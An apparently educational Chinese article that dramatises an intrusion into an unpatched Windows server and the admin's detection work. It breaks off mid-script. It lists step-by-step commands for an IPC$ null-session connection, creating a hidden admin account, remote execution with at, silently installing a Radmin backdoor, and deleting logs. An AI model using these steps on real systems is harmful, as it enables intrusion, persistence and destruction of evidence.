小黑小白对抗记
开篇:润墨网以专业的文秘视角,为您筛选了一篇小黑小白对抗记范文,如需获取更多写作素材,在线客服老师一对一协助。欢迎您的阅读与分享!
从本文你将学到
√ 黑客常见入侵方式
√ 如何避免空连接漏洞
√ 如何从日志发现木马藏身地
小黑:一个水平中等的“黑客”,曾拜师于一名高手,所以水平有所长进,最近正想找一台机器练手。
小白:刚刚上任不到三天的网管,进入网络安全行业不久,安全水平和发现隐患的意识还需要提高。这次的攻击事件其实并不是黑客水平有多高,而是由于网络安全意识不足,一个N年前的老漏洞没进行修补导致了服务器被攻击。反思一下,上任的几天里一直忙碌着升级、打补丁;但是忽略了服务器默认的一些系统漏洞和日志的保护,让黑客钻了空子。国内很多网络管理人员都容易出现这种错误。本文就是提醒各位网络管理员,除了给系统打补丁外,还需要掌握基本的检测技术和保护系统日志才能保证服务器的安全运行。
23:25 觅食――入侵检测
晚上11点,某大虾黑客的徒弟小黑打开“IPC$空连接扫描器”,想看看今天是否能中奖找到一台不设防的服务器。时间慢慢的流逝,深夜中传来一声“YEAH!”,哈哈,居然真的还有这么原始漏洞的主机!小黑兴奋地敲击着键盘开始了入侵工作。
小提示:什么是IPC$空连接
IPC$(Internet Process Connection)是共享命名管道的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然对方机器必须开了ipc$共享),而利用这个空的连接,连接者还可以得到目标主机上的用户列表,从而开始入侵主机。
23:30 挂上诱饵――建立IPC$空连接
小黑打开本地的cmd.exe命令行,输入net use \\202.99.10.*\ipc$ "" /usE:""尝试连接对方服务器,连接成功!输入:net view \\202.99.10.* 发现C$ D$ E$ admin$都默认开启着,原来是台新服务器啊!怪不得,小黑嘴里手上都不清闲。我要完全控制这台服务器!
23:45垂钓――远程控制
IPC$空连接这个漏洞不可能一直存在,先弄个远程管理员好了――屏幕中的命令行下出现了一段命令:
net user xiaohei$ hacker /add
net localgroup administrators xiaohei /add
恩,这样子就拥有了管理名为xiaohei$ 密码为hacker的高级管理员了,以后就可以通过Windows自带的“免杀控制器”:“远程桌面连接”控制服务器了! 来试验一下,打开本地开始菜单所有程序附件通讯远程桌面连接,在空白地方输入控制服务器的IP地址:202.99.10.*。“是放个木马上去呢还是添加一个FTP账号呢?”小黑脑子中闪现着无数恶毒的后门。正在这时音响中“嘣”的一声,错误提示:无法连接到远程计算机(见图1)!
图1
居然未开启远程服务端口了,难不倒我!继续在命令行下输入: copy C:\3389.exe \\202.99.10.*\admin$ ,将小黑本地的远程登录服务开启上传到202.99.10.*的服务器上。
net time \\202.99.10.*,查看远程服务器的系统时间为下面的入侵收集资料,现在时间是凌晨2:10分,at \\202.99.10.* 02:18 3389.exe,利用at命令在远程计算机的2:18分执行3389.exe文件,开启远程控制(需要自动重新启动计算机)。
小提示:远程桌面为什么“免杀”?
远程桌面本是微软公司为了方便网管维护服务器而推出的一项服务,用来连接到开启了远程桌面控制功能的计算机,但是已经被很多黑客用来控制电脑。由于是系统自带服务,也不会受到杀毒软件的查杀。
凌晨2:35上钩――种植木马
为了保险起见,还是再增加一个木马后门程序控制,小黑阴险地笑着祭出了radmin影子版,由于此软件属于管理工具,一般杀毒软件都不对其设防,所以修改后成了最安全的隐形后门。
小黑配制好木马后写了一段VBS代码使木马程序可以自动执行:
set ws=wscript.createobject(“wscript.shell”)
ws.run “regedit.exe /s r_server.reg”,0
ws.run “regedit.exe /s qidong.reg”,0
ws.run “r_server.exe /install /silence”,0
ws.run “r_server.exe /start”,0
将木马程序打包成muma.exe自解压文档,选择运行后自动执行VBS内容,将木马上传到系统盘下,继续利用:at \\202.99.10.* 02:15 muma.exe
凌晨2:40收网――日志清理
对了,得意不能大意,要把操作日志清理了,防止管理员发现主机被动过手脚:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
哈哈,看你还如何逃出我的掌心!!在恶魔的笑声中 202.99.10.*主机沦陷了。
凌晨3:30脱钩――查询服务
正在机房值班网管小白发现今天刚刚安装的WEB服务器(网页服务器)日志少了一段,“有可能被黑客入侵!”
“服务器刚刚安装还没进行安全设置就被强制运行了,没想到这么快就有黑客来入侵,现在的网络真是危险啊!”小白叹了口气,日志没了。看来要手工检测了。在命令行中输入:net start ,察看启动服务(见图2)。居然Terminal Services远程控制服务被开启了,肯定被添加了管理用户。
图2
输入: net user,察看本地所有用户,只有administator、ASPNET、IUSR_TOPJHCN、IWAM_TOPJHCN 几个正常用户,再分别用:
net user administator
net user ASPNET
查看了用户组,一切正常。看来很可能是被建立了隐藏的管理账号了。可以用下面提供的批处理程序察看隐藏账号,代码如下:
@echo off
cd.>netuser.txt
for /f "skip=4 tokens=1-3" %%i in ('net user') do (
if not "%%i"=="命令成功完成。" net use %%i>>netuser.txt 2>nul
if not "%%j"=="" net user %%j>>netuser.txt 2>nul
if not "%%k"=="" net user %%k>>netuser.txt 2>nul